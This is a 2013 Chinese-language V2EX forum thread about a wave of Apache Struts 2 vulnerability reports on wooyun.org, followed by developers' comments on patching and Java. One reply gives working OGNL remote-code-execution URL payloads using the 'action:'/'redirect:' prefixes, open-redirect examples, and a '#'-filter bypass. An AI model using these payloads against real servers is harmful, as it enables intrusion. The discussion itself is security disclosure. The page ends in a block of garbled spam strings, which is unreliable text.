wooyun.org上今天提交了一百多个关于struts的漏洞 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
lecher
V2EX    信息安全

wooyun.org上今天提交了一百多个关于struts的漏洞

  •  
  •   lecher 2013-07-17 20:59:54 +08:00 6957 次点击
    这是一个创建于 4539 天前的主题,其中的信息可能已经有所发展或是发生改变。
    使用这个java框架的网址基本都沦陷了,目前第一波目标都是针对BAT这种基本的公司的,有多少人因为这个事情要加班了?
    漏洞列表看这里 http://wooyun.org/bug.php?action=list&type=3
    14 条回复    1970-01-01 08:00:00 +08:00
    lecher
        1
    lecher  
    OP
       2013-07-17 21:19:03 +08:00
    受影响的是Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。主要安全漏洞如下:
    以POST的方式提交绕过对输入参数的部分过滤。命令执行主要是通过ognl对象的上下文内置静态函数进行执行的。
    如@Runtime@getRuntime().exec
    @class@method
    访问静态方法xwork 的ognl语句 执行,变量必须要带有#,之前通过\0023 (16进制的#) 来绕过,官方补丁屏蔽了这种但是可以利用\43(8进制的#)进行绕过。

    1. 通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下:
    http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


    http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


    http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

    2. 通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下:
    http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/

    http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23
    Kvm
        2
    Kvm  
       2013-07-17 21:26:34 +08:00
    大牛
    kevinv
        3
    kevinv  
       2013-07-17 21:35:01 +08:00
    我今天也刚注意到
    luikore
        4
    luikore  
       2013-07-17 22:03:58 +08:00
    珍爱生命, 远离 java, 这句话都说多少年了...
    raptium
        5
    raptium  
       2013-07-17 22:40:26 +08:00
    苦逼 Java 程序员表示刚紧急处理完两个项目回家……
    Paranoid
        6
    Paranoid  
       2013-07-17 22:58:17 +08:00
    和 struts 有仇呀,一下爆这么多, 怎么也得一天一个,慢慢玩 ..哈哈
    aurorawu
        7
    aurorawu  
       2013-07-17 23:33:55 +08:00
    人生苦短,工作之余我用Python
    ccbikai
        8
    ccbikai  
    PRO
       2013-07-17 23:40:28 +08:00 via Android
    为什么他们昨天前天没有提交呢?

    都是吃剩饭的?
    lecher
        9
    lecher  
    OP
       2013-07-18 00:25:01 +08:00   1
    因为漏洞的原理和应用已经公布了,知道如何用的人很多,官方又公布了补丁,现在wooyun上面爆提交其实就是抢在厂商没有打补丁这段时间多刷点wooyun积分。
    实际的入侵工作恐怕早就已经做过了。白帽们不屑于扫库拖库的事情,他们就是想赚点名声。
    而那些利用漏洞牟利的人,恐怕早就把该拖的库拖走了。
    cctvsmg
        10
    cctvsmg  
       2013-07-18 04:52:53 +08:00
    @lecher 此事其实apache要负主要责任,公布的太草率了
    davepkxxx
        11
    davepkxxx  
       2013-07-18 05:47:22 +08:00
    没影响,早就换成spring-mvc了。
    vietor
        12
    vietor  
       2013-07-18 09:10:55 +08:00
    @raptium java的架构一般都太复杂了,坑没准在哪里出现。将板子打到java语言本上不太合适。
    davepkxxx
        13
    davepkxxx  
       2013-07-19 12:30:01 +08:00
    struts项目那帮人就是个2,修补一个漏洞时表现的也很奇葩。官方完全没有理解漏洞原理,仅仅针对漏洞报告者提供的特征字符做了过滤,结果接二连三的被绕过,一个简单的漏洞,修补了两三次都没有修补好。
    zhttty
        14
    zhttty  
       2013-07-19 12:50:40 +08:00
    很多人根本就不理解struts运行核心流程,培训了几周就用了...出了问题能怪谁?源码就在那里,不看是你个人的问题。
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2643 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 26ms UTC 11:50 PVG 19:50 LAX 03:50 JFK 06:50
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86